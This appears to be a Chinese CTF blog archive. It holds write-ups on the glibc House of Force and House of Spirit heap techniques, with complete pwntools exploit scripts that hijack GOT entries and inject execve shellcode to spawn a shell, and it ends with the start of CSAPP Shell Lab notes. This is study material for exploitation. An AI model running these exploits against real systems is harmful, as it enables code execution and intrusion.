p.readuntil("Org:")
p.send("a"*0x40)
p.readuntil("Host:")
p.sendline(p32(0xffffffff))
p.readuntil("Enjoy:")

# noteList address and the top chunk location, 0xD8 above the leaked pointer
# (values from the write-up).
note_list = 0x804B120
top_chunk_addr = heap + 0xD8
# Request size that moves the top chunk to note_list; the extra 24 accounts
# for the 0x18-byte chunk created by new_note(0x10, ...) below.
offset = note_list - (top_chunk_addr + 0x8) - 24
# Note 0: per the write-up, this puts 0x10 into noteLens[0] for later edits.
new_note(0x10, "kkk")

# Note 1: the huge request that relocates the top chunk.
new_note(offset,'')
# Note 2: allocated over noteList; its content becomes
# noteList[0] = free@got, noteList[1] = noteList[2] = atoi@got.
payload = p32(elf.got["free"])
payload += p32(elf.got["atoi"])
payload += p32(elf.got["atoi"])
new_note(0x100, payload)

# Writing through noteList[0] replaces the free GOT entry with a
# printf-related address, so "deleting" note 1 prints the bytes at atoi@got
# instead of freeing -- presumably via printf's PLT; confirm.
edit_note(0, p32(elf.symbols["printf"]+6))
delete_note(1)
atoi_libc = u32(p.read(4))
p.readuntil("success.")
libc_base = atoi_libc - libc.symbols["atoi"]
print("libc_base >> " + hex(libc_base))

# Writing through noteList[2] replaces the atoi GOT entry with system.
system = libc.symbols["system"] + libc_base
edit_note(2, p32(system))

# Presumably the next menu input is passed to atoi, now system -- confirm.
p.sendline("/bin/sh")
p.interactive()

house of force 小结（2.23-32位）

house of force 的核心在于：

溢出字节覆盖 top chunk 的 size 位
计算偏移，把 top chunk 分割到可以修改的目标地址

特点归纳如下：

需要可以控制的修改模块
需要可以输入任意大小的申请模块（包括负数）
需要堆溢出（覆盖“topchunk->size”）
不需要释放模块

修改“topchunk->size”和“计算目标偏移”就是这种攻击的关键，通常用堆溢出的方式来修改“topchunk->size”，而以下公式可以用来计算偏移

1
2
3

offset = target_addr - (top_chunk_addr + 0x8) # 64位就改为"+0x10"
# target_addr：目标地址
# top_chunk_addr：top chunk起始地址

PS：此题目在 2.27 版本无法打通，GDB调试后发现 “0xffffffff” 并没有被 strcpy 复制

2.23 版本：

pwndbg> telescope 0x8aec000
00:0000│  0x8aec000 ◂— 0x0
01:0004│  0x8aec004 ◂— 0x49 /* 'I' */
02:0008│  0x8aec008 ◂— 0x61616161 ('aaaa')
... ↓     5 skipped
pwndbg> 
08:0020│  0x8aec020 ◂— 0x61616161 ('aaaa')
... ↓     7 skipped
pwndbg> 
10:0040│  0x8aec040 ◂— 0x61616161 ('aaaa')
11:0044│  0x8aec044 ◂— 0x61616161 ('aaaa')
12:0048│  0x8aec048 —▸ 0x8aec008 ◂— 0x61616161 ('aaaa')
13:004c│  0x8aec04c ◂— 0x49 /* 'I' */
14:0050│  0x8aec050 ◂— 0xffffffff
15:0054│  0x8aec054 ◂— 0x0

2.27 版本：

pwndbg> telescope 0x9b19158
00:0000│  0x9b19158 ◂— 0x0
01:0004│  0x9b1915c ◂— 0x51 /* 'Q' */
02:0008│  0x9b19160 ◂— 0x61616161 ('aaaa')
... ↓     5 skipped
pwndbg> 
08:0020│  0x9b19178 ◂— 0x61616161 ('aaaa')
... ↓     7 skipped
pwndbg> 
10:0040│  0x9b19198 ◂— 0x61616161 ('aaaa')
11:0044│  0x9b1919c ◂— 0x61616161 ('aaaa')
12:0048│  0x9b191a0 —▸ 0x9b19160 ◂— 0x61616161 ('aaaa')
13:004c│  0x9b191a4 ◂— 0x0
14:0050│  0x9b191a8 ◂— 0x0
15:0054│  0x9b191ac ◂— 0x51 /* 'Q' */
16:0058│  0x9b191b0 ◂— 0xffffffff

发现程序的对齐方式变了：

2.23 版本：8字节对齐（0x8）
2.27 版本：16字节对齐（0x10）

导致“org[64]”到了“0x9b191a4”才结束，“host[68]”和“org[64]”之间有“\x00”，所以复制失败

House Of Force-原理

Posted on 2022-03-04 Edited on 2022-03-05 In HouseOfSeries 6.4k 6 mins.

House Of Force

house of force 是修改 top chunk size 的一种利用方法

利用 top chunk 分割中的漏洞来申请任意 chunk，再通过修改模块进行 GOT劫持，hook劫持

House Of Force 利用姿势

该利用姿势是由于libc的堆管理在 malloc 的时候默认 top chunk 的 size 是正确合法的，所以不会去检查 top chunk 的 size 值，这就导致了一种情况，当一个程序存在可以修改 top chunk size 的漏洞时，我们把 top chunk 的 size 修改成 0xffffffff(x86)

假设这个时候的 top_chunk=0x601200，然后 malloc(0xffe00020)，然后对 malloc 申请的 size 进行检查，0xffe00030 < top_chunk_size ，所以可以成功malloc内存，然后计算top_chunk的新地址：0xffe00030+0x601200=0x100401230, 因为是x86环境，最高位溢出了，所以top_chunk=0x401230

然后下次我们再malloc的时候，返回的地址就是0x401238

Top chunk的分割机制与利用点

top chunk的作用是作为后备堆空间，在各bin中没有chunk可提供时，分割出一个chunk提供给用户

简化版本的分割操作：（为了方便看懂，进行了修改）

/* Simplified excerpt (edited by the author for readability): carving a
   request of nb bytes out of the top chunk. */
victim = av->top; /* address of the current top chunk */
size   = chunksize(victim); /* size of the top chunk */
/* Only split when the top chunk can hold nb plus a minimal remainder. */
if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) 
{
    remainder_size = size - nb; /* size left over after the split */
    remainder      = chunk_at_offset(victim, nb); 
    av->top        = remainder; /* the remainder becomes the new top chunk */
    set_head(victim, nb | PREV_INUSE |
            (av != &main_arena ? NON_MAIN_ARENA : 0)); /* header of the chunk being handed out (the old top) */
    set_head(remainder, remainder_size | PREV_INUSE); /* header of the new top chunk */

    check_malloced_chunk(av, victim, nb);
    void *p = chunk2mem(victim);
    alloc_perturb(p, bytes);
    return p;
}

首先是libc会检查用户申请的大小，top chunk是否能给的起，如果给得起，就由 top chunk 的 head 处，以用户申请大小所匹配的 chunk 大小为偏移量，将 top chunk 的位置“推”到新的位置，而原来的 top chunk head 处就作为新的堆块被分配给用户了

如果我们能控制用户申请的大小为任意值，我们就能将 top chunk 劫持到任意内存地址，然后就可以控制目标内存

1	if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))

保护检查：只有 top chunk 的 size 大于等于申请的 size，才会有后续操作，而 pwn 中劫持内存常常劫持的是malloc_hook、got表等指针，与堆空间中的 top chunk 相距甚远，远到所需要申请的size必定超出top chunk 现有的大小

破解办法：大小检查时用的数据类型是 unsigned long，如果能通过某些漏洞（比如溢出）将 top chunk 的 size 字段篡改成 -1，那么在做这个检查时，size 就变成了无符号整数中最大的值，这样一来，不管用户申请多大的堆空间都可以满足条件

// 此外，虽然此处的检查中，用户申请的大小也被当做无符号整型对待，但是在后面推 top chunk 的时候是作为 int 对待的，因此如果劫持目标内存地址比 top chunk 低，我们申请负数大小的内存是可以劫持过去的

利用条件：

用户能够篡改 top chunk 的 size 字段（篡改为负数或很大值）
用户可以申请任意大小的堆内存（包括负数）

版本对 House Of Force 的影响

libc-2.23

  /* Try to use top chunk */
  /* Require that there be a remainder, ensuring top always exists  */
  if ( (remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE)
  {

#if HAVE_MMAP
    /* If the request is big and there are not yet too many regions,
       and we would otherwise need to extend, try to use mmap instead.  */
    if ((unsigned long)nb >= (unsigned long)mmap_threshold &&
        n_mmaps < n_mmaps_max &&
        (victim = mmap_chunk(nb)) != 0)
      return victim;
      /* Reached only when top is too small for nb: a request of at least
         mmap_threshold bytes is served by mmap_chunk instead. */
#endif

    /* Try to extend */
    malloc_extend_top(ar_ptr, nb);
    if ((remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE)
    {
#if HAVE_MMAP
      /* A last attempt: when we are out of address space in a
         non-main arena, try mmap anyway, as long as it is allowed at
         all.  */
      if (ar_ptr != &main_arena &&
          n_mmaps_max > 0 &&
          (victim = mmap_chunk(nb)) != 0)
        return victim;
        /* Second mmap_chunk attempt, made only after extending top failed
           to provide enough room. */
#endif
      return 0; /* propagate failure */
    }
  }
  victim = top(ar_ptr);
  set_head(victim, nb | PREV_INUSE); /* header of the chunk returned to the caller (the old top) */
  top(ar_ptr) = chunk_at_offset(victim, nb);
  set_head(top(ar_ptr), remainder_size | PREV_INUSE); /* header of the remainder, which is the new top */
  check_malloced_chunk(ar_ptr, victim, nb); /* per the write-up this check has almost no effect on the attack */
  return victim;

和给出的例子几乎一样，通过“topchunk->size”判断是否调用“mmap_chunk”

完全可以打 House Of Force

libc-2.27

if (av != &main_arena)
    {
      heap_info *old_heap, *heap;
      size_t old_heap_size;

      /* First try to extend the current heap. */
      old_heap = heap_for_ptr (old_top);
      old_heap_size = old_heap->size;
      if ((long) (MINSIZE + nb - old_size) > 0 
          /* Top chunk is too small: ask grow_heap for the missing bytes. */
          /* With a forged, very large old_size the signed difference above
             is not positive, so this branch is not taken during a
             House Of Force attempt. */
          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
        {
          av->system_mem += old_heap->size - old_heap_size;
          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
                    | PREV_INUSE);
        }
      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
        { 
          /* Use a newly allocated heap.  */
          heap->ar_ptr = av;
          heap->prev = old_heap;
          av->system_mem += heap->size;
          /* Set up the new top.  */
          top (av) = chunk_at_offset (heap, sizeof (*heap));
          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);

          /* Setup fencepost and free the old top chunk with a multiple of
             MALLOC_ALIGNMENT in size. */
          /* The fencepost takes at least MINSIZE bytes, because it might
             become the top chunk again later.  Note that a footer is set
             up, too, although the chunk is marked in use. */
          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
          if (old_size >= MINSIZE) /* old top is big enough to split: fence it and free the rest */
            {
              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
              _int_free (av, old_top, 1);
            }
          else /* too small to split: the whole old top becomes the fencepost */
            {
              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
              set_foot (old_top, (old_size + 2 * SIZE_SZ));
            }
        }
      else if (!tried_mmap)
        /* We can at least try to use to mmap memory.  */
        goto try_mmap;
    }
................

这里只展示了“av != &main_arena”，不是 House Of Force 的重点，而“av == &main_arena”太长不方便展示，给出部分代码方便查源码时定位

程序复杂了不少，也多了许多检查：

/* top chunk is OK */
check_chunk (av, av->top);

# define check_chunk(A, P) do_check_chunk (A, P)

1
2
3

/* Memory allocated from the system in this arena.  */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;

/* Sanity-check chunk p of arena av with assertions: a non-mmapped chunk
   must lie inside the arena's address window (or satisfy the top-chunk
   invariants when p is av->top), and an mmapped chunk must lie outside
   that window and be page-aligned.
   NOTE(review): in upstream glibc, check_chunk appears to expand to this
   function only when MALLOC_DEBUG is enabled -- confirm before treating
   these assertions as a mitigation in release builds. */
static void
do_check_chunk (mstate av, mchunkptr p)
{
  unsigned long sz = chunksize (p);
  /* min and max possible addresses assuming contiguous allocation */
  char *max_address = (char *) (av->top) + chunksize (av->top);
  char *min_address = max_address - av->system_mem;
    /* Key point for the write-up: both bounds are computed from the size
       stored in av->top, so a forged (very large) top size shifts
       max_address, and min_address with it, far away from the real heap.
       The author's argument is that this window is what defeats
       House Of Force here. */
    
  if (!chunk_is_mmapped (p)) 
    {
      /* Has legal address ... */
      if (p != av->top)
        {
          if (contiguous (av))
            {
              assert (((char *) p) >= min_address);
              /* With min_address skewed by the forged top size, the newly
                 carved chunk is expected to fall below it and fail here. */
              assert (((char *) p + sz) <= ((char *) (av->top)));
            }
        }
      else 
        {
          /* top size is always at least MINSIZE */
          assert ((unsigned long) (sz) >= MINSIZE);
          /* top predecessor always marked inuse */
          assert (prev_inuse (p));
        }
    }
  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
    {
      /* address is outside main heap  */
      if (contiguous (av) && av->top != initial_top (av))
        {
          assert (((char *) p) < min_address || ((char *) p) >= max_address);
        }
      /* chunk is page-aligned */
      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
      /* mem is aligned */
      assert (aligned_OK (chunk2mem (p)));
    }
}

在检查中给chunk添加了一个“范围”（min_address & max_address），想要打 House Of Force ，就需要把“topchunk->size”设置得很大，这就导致了这个“范围”十分极端，不可能成立

所以不能打 House Of Force

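总而言之：按照上面的分析，House Of Force 可以在 libc-2.23 中生效，因为 libc-2.23 会在检查了“topchunk->size”后就进行分割，可以直接利用，而 libc-2.27 的 do_check_chunk 设置了一个“范围”，限制了申请chunk的地址范围，这样就导致 top chunk 无法分割到目标地址了（补充：在发行版 glibc 中，check_chunk 只有在开启 MALLOC_DEBUG 时才会展开为 do_check_chunk，否则是空宏，上述断言不会执行；真正封堵 House Of Force 的是 glibc-2.29 在 _int_malloc 中加入的 top chunk size 检查“malloc(): corrupted top size”，因此该手法通常在 glibc-2.28 及更早版本中仍然可用，实际利用前请以目标 libc 的源码为准）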

House Of Spirit-2.31-64

Posted on 2022-03-03 Edited on 2022-03-05 In Pwn train 8.7k 8 mins.

pwn200

➜  [/home/ywhkkx/桌面] ./pwn200 
who are u?
ywhkkx
ywhkkx, welcome to ISCC~ 
give me your id ~~?
13
give me money~
200

=======EASY HOTEL========
1. check in
2. check out
3. goodbye
your choice :

pwn200: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5a7b9f542c0bf79112b5be3f0198d706cce1bcad, stripped

[*] '/home/ywhkkx/桌面/pwn200'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

64位，全关

// Decompiled entry routine: reads a name of up to 48 bytes, echoes it,
// reads an id with getNum(), then continues in pwn2().
void pwn()
{
  __int64 i; // [rsp+10h] [rbp-40h]
  char v1[48]; // [rsp+20h] [rbp-30h] BYREF

  puts("who are u?");
  // Read one byte at a time, at most 48 bytes (the full size of v1).
  for ( i = 0LL; i <= 47; ++i )
  {
    read(0, &v1[i], 1uLL);
    if ( v1[i] == 10 )                       // newline ends the input
    {
      v1[i] = 0;                             // the only place a terminator is written
      break;
    }
  }
  // If all 48 bytes were non-newline, v1 has no terminator and %s keeps
  // printing whatever follows v1 on the stack.
  printf("%s, welcome to ISCC~ \n", v1);
  puts("give me your id ~~?");
  getNum();
  pwn2();
}

// Decompiled routine: allocates a 0x40-byte heap buffer, reads 0x40 bytes
// into a 56-byte stack buffer, copies it to the heap buffer, stores the
// pointer in the global ptr and enters the menu loop.
void pwn2()
{
  char buf[56]; // [rsp+0h] [rbp-40h] BYREF
  char *dest; // [rsp+38h] [rbp-8h]

  dest = (char *)malloc(0x40uLL);
  puts("give me money~");
  // Reads 0x40 (64) bytes into the 56-byte buf: per the stack offsets
  // above, the last 8 bytes land on dest.
  read(0, buf, 0x40uLL);
  strcpy(dest, buf);                            // dest may already have been overwritten by the read above
  ptr = dest;                                   // the (possibly attacker-chosen) pointer becomes the global ptr
  hotel();
}

存在栈溢出，buf 越界覆盖了 dest

// Decompiled menu loop: 1 = checkIn, 2 = checkOut, 3 = leave the loop,
// anything else prints "invalid choice".
void hotel()
{
  int Num; // eax

  while ( 1 )
  {
    // Inner loop keeps handling choice 2 until some other choice is made.
    while ( 1 )
    {
      menu();
      Num = getNum();
      if ( Num != 2 )
        break;
      checkOut();                               // frees the global ptr
    }
    if ( Num == 3 )
      break;
    if ( Num == 1 )
      checkIn();                                // mallocs into the global ptr
    else
      puts("invalid choice");
  }
  puts("good bye~");
}

标准的堆模板

// Decompiled "check out" handler: frees the global ptr if it is set and
// clears it afterwards.
void checkOut()
{
  if ( ptr )
  {
    puts("out~");
    free(ptr);
    ptr = 0LL;                                  // cleared after free, so it cannot be freed twice
  }
  else
  {
    puts("havn't check in");                    // basic guard: nothing to free
  }
}

free 有一个基础检查，置空了指针

// Decompiled "check in" handler: when the global ptr is empty, asks for a
// length in 1..0x80, allocates that many bytes into ptr and reads that many
// bytes into the new buffer.
void checkIn()
{
  int size; // [rsp+Ch] [rbp-4h]

  if ( ptr )
  {
    puts("already check in");
  }
  else
  {
    puts("how long?");
    size = getNum();
    if ( size <= 0 || size > 0x80 )             // accepted range is 1..0x80
    {
      puts("invalid length");
    }
    else
    {
      ptr = malloc(size);
      printf("give me more money : ");
      printf("\n%d\n", (unsigned int)size);
      read(0, ptr, (unsigned int)size);         // fills the chunk with caller-supplied bytes
      puts("in~");
    }
  }
}

入侵思路

没有开NX，很明显是为了打 shellcode 注入

// Excerpt of the name-reading loop: at most 48 single-byte reads into v1.
for ( i = 0LL; i <= 47; ++i )
{
  read(0, &v1[i], 1uLL);
  if ( v1[i] == 10 )                          // leak rbp: a terminator is written only when a newline arrives
  {
    v1[i] = 0;
    break;
  }
}

这里有个很明显的漏洞：read 需要检查到“\n”才会写入“\x00”，如果 48 次循环后没有输入“\n”，就会造成 leak，先在GDB中看看是哪个数据“leak”了：（在IDA中看就是rbp）

pwndbg> search -s aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
warning: Unable to access 16000 bytes of target memory at 0x7ffff7bd2d1f, halting search.
[stack]         0x7fffffffb680 0x6161616161616161 ('aaaaaaaa')
[stack]         0x7fffffffdd40 0x6161616161616161 ('aaaaaaaa')
pwndbg> x/20xg 0x7fffffffb680
0x7fffffffb680:	0x6161616161616161	0x6161616161616161
0x7fffffffb690:	0x6161616161616161	0x6161616161616161
0x7fffffffb6a0:	0x6161616161616161	0x6161616161616161
0x7fffffffb6b0:	0x202c7fffffffdd90	0x20656d6f636c6577 
0x7fffffffb6c0:	0x7e43435349206f74	0x0000000000000a20
0x7fffffffb6d0:	0x0000000000000000	0x0000000000000000
0x7fffffffb6e0:	0x0000000000000000	0x0000000000000000

泄露了 rbp 的地址，我们就可以把 shellcode 放在栈中，用 rbp 来计算 shellcode 的地址

# Assemble pwntools' stock amd64 Linux "spawn a shell" shellcode.
shellcode = asm(shellcraft.amd64.linux.sh(), arch = 'amd64')

# Pad the name to at least 48 bytes and send it without a newline.
payload  = b''
payload += shellcode.ljust(48)
 
p.recvuntil('who are u?\n')
p.send(payload)
p.recvuntil(payload)
 
# The 6 bytes echoed right after the payload are decoded as a little-endian
# pointer; the write-up identifies it as the leaked saved rbp.
rbp_addr = u64(p.recvn(6).ljust(8, b'\x00'))
success('rbp_addr >> '+hex(rbp_addr))
# Offsets below come from the stack layout shown in the write-up's GDB dump.
shellcode_addr = rbp_addr - 0x50 
success("shellcode_addr: "+hex(shellcode_addr))

fake_addr = rbp_addr - 0x90 # offset 0x40 to shellcode, 0x400a29 return address
success("fake_addr: "+hex(fake_addr))

首先我们是可以控制 free 的：（通过 buf 溢出到 *dest）

char buf[56]; // [rsp+0h] [rbp-40h] BYREF
char *dest; // [rsp+38h] [rbp-8h]

那么就可以利用 House Of Spirit 进行 WAA，但是选择 free 哪个地址呢？

在 GDB 中，把 rbp_addr 向上打印，并标记出可以控制的区域（还要留心“数字”）

pwndbg> telescope 0x7fffc43095b0-0x100 // rbp_addr-0x100
00:0000│     0x7fffc43094b0 —▸ 0x400cb7 ◂— imul   esi, dword ptr [esi + 0x65], 0x20656d20 /* 'give me money~' */
01:0008│     0x7fffc43094b8 —▸ 0x7f48002ecbd2 (puts+418) ◂— cmp    eax, -1
02:0010│     0x7fffc43094c0 ◂— 0x50000 
03:0018│     0x7fffc43094c8 ◂— 0x0
04:0020│     0x7fffc43094d0 —▸ 0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— ...
05:0028│     0x7fffc43094d8 —▸ 0x4006b0 ◂— xor    ebp, ebp
06:0030│     0x7fffc43094e0 —▸ 0x7fffc4309690 ◂— 0x1
07:0038│ rsp 0x7fffc43094e8 —▸ 0x400a64 ◂— lea    rdx, [rbp - 0x40]
pwndbg> 
08:0040│ rsi 0x7fffc43094f0 —▸ 0x7fffc4309690 ◂— 0x1 // 可控:0x40
09:0048│     0x7fffc43094f8 ◂— 0x0
0a:0050│     0x7fffc4309500 ◂— 0x0
0b:0058│     0x7fffc4309508 —▸ 0x7f48002ac740 (atoi+16) ◂— add    rsp, 8
0c:0060│     0x7fffc4309510 ◂— 9 /* '\t' */
0d:0068│     0x7fffc4309518 —▸ 0x4008b5 ◂— leave  
0e:0070│     0x7fffc4309520 —▸ 0x7fffc4003233 ◂— 0x0 // fake_addr
0f:0078│     0x7fffc4309528 —▸ 0x1b67260 ◂— 0x0
pwndbg> 
10:0080│ rbp 0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— push   r15 // 可控区域结束
11:0088│     0x7fffc4309538 —▸ 0x400b34 ◂— leave // target
12:0090│     0x7fffc4309540 —▸ 0x7f48006542a0 (_IO_file_jumps) ◂— 0x0
13:0098│     0x7fffc4309548 —▸ 0x7f48002f68c9 (_IO_file_setbuf+9) ◂— test   rax, rax
14:00a0│     0x7fffc4309550 ◂— 0x30 /* '0' */
15:00a8│     0x7fffc4309558 ◂— 0x20 /* ' ' */
16:00b0│     0x7fffc4309560 ◂— 0x91969dd1bb48c031 // shellcode_addr
17:00b8│     0x7fffc4309568 ◂— 0x53dbf748ff978cd0

现在的目的是：利用 WAA 把“shellcode_addr”写入某个函数的返回地址

这里选择写入“0x7fffc4309538”（pwn2的返回地址），下面说明原因：

11:0088│ 0x7fffc4309538 —▸ 0x400b34 ◂— leave // target

08:0040│ rsi 0x7fffc43094f0 —▸ 0x7fffc4309690 ◂— 0x1 // 可控:0x40
    ............
10:0080│ rbp 0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— push   r15 // 可控区域结束
    ............
14:00a0│     0x7fffc4309550 ◂— 0x30 /* '0' */
15:00a8│     0x7fffc4309558 ◂— 0x20 /* ' ' */

House Of Spirit 需要写入“chunk->size”和“nextchunk->size”，在发现数字“0x30”和“0x20”后，发现它距离“可控区域”不远，所以选择离他们最近的返回地址“0x7fffc4309538”作为目标地址（并且这个地址在“可控区域”以外，不用担心它被覆写）

因为最后要写入“0x7fffc4309538”，所以必须 free 这之前的地址，这样申请回来的时候就可以向下控制，这里选择“0x7fffc4309520”（即 fake_addr = rbp_addr - 0x90，该地址处当前存放的值是 0x7fffc4003233）

0e:0070│ 0x7fffc4309520 —▸ 0x7fffc4003233 ◂— 0x0 // fake_addr

对写入的数据进行构思，使“chunk->size”和“nextchunk->size”可以接上：

# Five zero qwords followed by 0x41: the sixth qword is meant to serve as the
# fake chunk's size field. The payload starts with NUL bytes.
data = p64(0) * 4 + p64(0) + p64(0x41)        # no strcpy
# Pad to 56 bytes, then append fake_addr as the final 8 bytes of the 64 sent.
data = data.ljust(56, b'\x00') + p64(fake_addr)
print(data)
p.send(data)

pwndbg> stack 50
00:0000│ rsi rsp 0x7fffc43094f0 ◂— 0x0 // 从这里开始的区域都是可以控制的
... ↓            4 skipped
05:0028│         0x7fffc4309518 ◂— 0x41 // chunk->size
06:0030│ rax rdi 0x7fffc4309520 ◂— 0x0 // fake_addr
07:0038│         0x7fffc4309528 —▸ 0x7fffc4309520 ◂— 0x0
08:0040│ rbp     0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— push   r15
09:0048│         0x7fffc4309538 —▸ 0x400b34 ◂— leave // target 
0a:0050│         0x7fffc4309540 —▸ 0x7f48006542a0 (_IO_file_jumps) ◂— 0x0
0b:0058│         0x7fffc4309548 —▸ 0x7f48002f68c9 (_IO_file_setbuf+9) ◂— test   rax, rax
0c:0060│         0x7fffc4309550 ◂— 0x30 
0d:0068│         0x7fffc4309558 ◂— 0x20 // nextchunk->size

In [4]: hex(0x7fffc4309518+0x40)
Out[4]: '0x7fffc4309558' // chunk->size和nextchunk->size接上了

释放掉这个假chunk，再申请回来，就可以控制目标地址了（0x7fffc4309538）

# Menu option 2: the program frees its global pointer (fake_addr at this point).
p.recvuntil('choice : ')
p.sendline('2')     # free(fake_addr)

# Menu option 1 with length 48: the write-up expects this allocation to hand
# the fake chunk back.
p.recvuntil('choice : ')
p.sendline('1')     # malloc(fake_addr) 
p.recvuntil('long?')
p.sendline('48')

# 0x18 filler bytes, then shellcode_addr at offset 0x18 of the returned buffer.
data = b'a' * 0x18 + p64(shellcode_addr) # write to target_addr
data = data.ljust(48, b'\x00')
p.send(data)

pwndbg> telescope 0x7fffc4309520
00:0000│  0x7fffc4309520 ◂— 0x6161616161616161 ('aaaaaaaa')
... ↓     2 skipped
03:0018│  0x7fffc4309538 —▸ 0x7fffc4309560 ◂— 0x91969dd1bb48c031 // target
04:0020│  0x7fffc4309540 ◂— 0x0
05:0028│  0x7fffc4309548 ◂— 0x0
06:0030│  0x7fffc4309550 ◂— 0x30 /* '0' */
07:0038│  0x7fffc4309558 ◂— 0x20 /* ' ' */

完整代码：

from pwn import *

context.log_level = 'debug'
# p = remote('127.0.0.1', 7777)
p = process('./pwn200')

# Raw amd64 shellcode. It must be a bytes literal: it is concatenated with
# bytes below, and on Python 3 mixing str and bytes raises TypeError.
shellcode = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

# Stage 1: send exactly 48 non-newline bytes as the name so that the echoed
# string runs on past the name buffer, then read the bytes that follow it.
payload = shellcode.ljust(48)

p.recvuntil(b'who are u?\n')
p.send(payload)
p.recvuntil(payload)

# The 6 bytes after the echoed payload are decoded as a little-endian pointer
# (the leaked saved rbp according to the write-up).
rbp_addr = u64(p.recvn(6).ljust(8, b'\x00'))
success('rbp_addr >> ' + hex(rbp_addr))
# Offsets are specific to this binary's stack layout (taken from the GDB dump).
shellcode_addr = rbp_addr - 0x50
success("shellcode_addr: " + hex(shellcode_addr))

fake_addr = rbp_addr - 0x90
success("fake_addr: " + hex(fake_addr))

p.recvuntil(b'give me your id ~~?\n')
p.sendline(b'32')
p.recvuntil(b'give me money~\n')

# Stage 2: 64-byte write into the 56-byte buffer. The sixth qword (0x41) is
# the fake chunk's size field; the last 8 bytes replace the pointer that the
# program later frees.
data = p64(0) * 4 + p64(0) + p64(0x41)
data = data.ljust(56, b'\x00') + p64(fake_addr)
p.send(data)

# Stage 3: free the fake chunk, then request 48 bytes to get it back.
p.recvuntil(b'choice : ')
p.sendline(b'2')
p.recvuntil(b'choice : ')
p.sendline(b'1')
p.recvuntil(b'long?')
p.sendline(b'48')

# Stage 4: place shellcode_addr at offset 0x18 of the reclaimed buffer, which
# is where the targeted return address sits.
data = b'a' * 0x18 + p64(shellcode_addr)
data = data.ljust(48, b'\x00')
p.send(data)

# Leave the menu loop so the overwritten return address is used.
p.recvuntil(b'choice')
p.sendline(b'3')

p.interactive()

house of spirit 小结（2.27~2.31-64位）

当考虑使用 house of spirit 时，一定要多多关注“可控区域”里的“数字”（有时候会利用“计数器”来构造“数字”）

利用这些“数字”充当“chunk->size”或者“nextchunk->size”，并调节“size”的大小使其可以连接起来，这样一般就可以通过 free 的检查了

注意：GDB中的“bins”指令看不见 free 掉的 fake_chunk，GDB也不会在 fastbin 中显示 fake_chunk，但是实际上是可以直接申请 fake_chunk 的

CSapp-Shell Lab

Posted on 2022-03-02 Edited on 2022-10-10 In Knowledge 50k 45 mins.

Shell Lab

本实验的目的是让学生更加熟悉过程控制和信号的概念，您可以通过编写一个简单的Unix shell程序来实现这一点，该程序支持作业控制

实验文件

tsh.c：实验主体文件，代码写在这里
tshref.out：包含参考shell程序的所有测试数据的输出结果
tshref：示例程序

开始实验前需要补充一些知识（可以一边看函数，一边学习这些知识）

进程 & 线程 & 任务

进程

进程是指一个具有 独立功能 的程序在 某个数据集合上 的一次动态执行过程，它是操作系统进行资源分配和调度的基本单元

一次任务的运行可以发多个进程，这些进程相互合作来完成该任务的一个最终目标

每个进程都拥有自己的数据段，代码段和堆栈段，这就造成了进程在进行切换时操作系统的开销比较大，为了提高效率，操作系统又引入了另一个概念——线程

线程

线程是进程上下文中执行的代码序列，又称为轻量级的进程，它是操作系统能够调度的最小单元

线程可以对进程的内存空间和资源进行访问，并与同一进程中的其他线程共享，因此，线程的上下文切换的开销比进程小得多

一个进程可以拥有多个线程，其中每个线程共享该进程所拥有的资源，要注意的是，由于线程共享了进程的资源和地址空间，因此，任何线程对系统资源的操作都会给其他线程带来影响，由此可知，多线程中的同步是非常重要的问题

任务

任务是一个逻辑概念，指由一个软件完成的活动，或者是为实现某个目的的一系列操作

通常一个任务是一个程序的一次运行，一个任务包含一个或多个完成独立功能的子任务，这个独立的子任务是进程或者是线程

参考：操作系统中任务、进程和线程总结

进程控制

进程控制的主要功能是对系统中的所有进程实施有效的管理，它具有创建新进程、撤销已有进程、实现进程状态转换等功能

在操作系统中，一般把进程控制用的程序段称为原语，原语的特点是执行期间不允许中断，它是一个不可分割的基本单位

在三态模型中，进程状态分为三个基本状态，即运行态，就绪态，阻塞态

在五态模型中，进程分为新建态，终止态，运行态，就绪态，阻塞态

下面是实现进程控制的部分函数：

pid_t getpid(void);
pid_t getppid(void);

getpid 函数返回调用进程的 PID

getppid 函数返回它的父进程的 PID

void exit(int status);

exit 函数以 status 退出状态来终止进程

pid_t fork(void);

父进程通过调用 fork 函数创建一个新的运行的子进程

// 新创建的子进程几乎但不完全与父进程相同

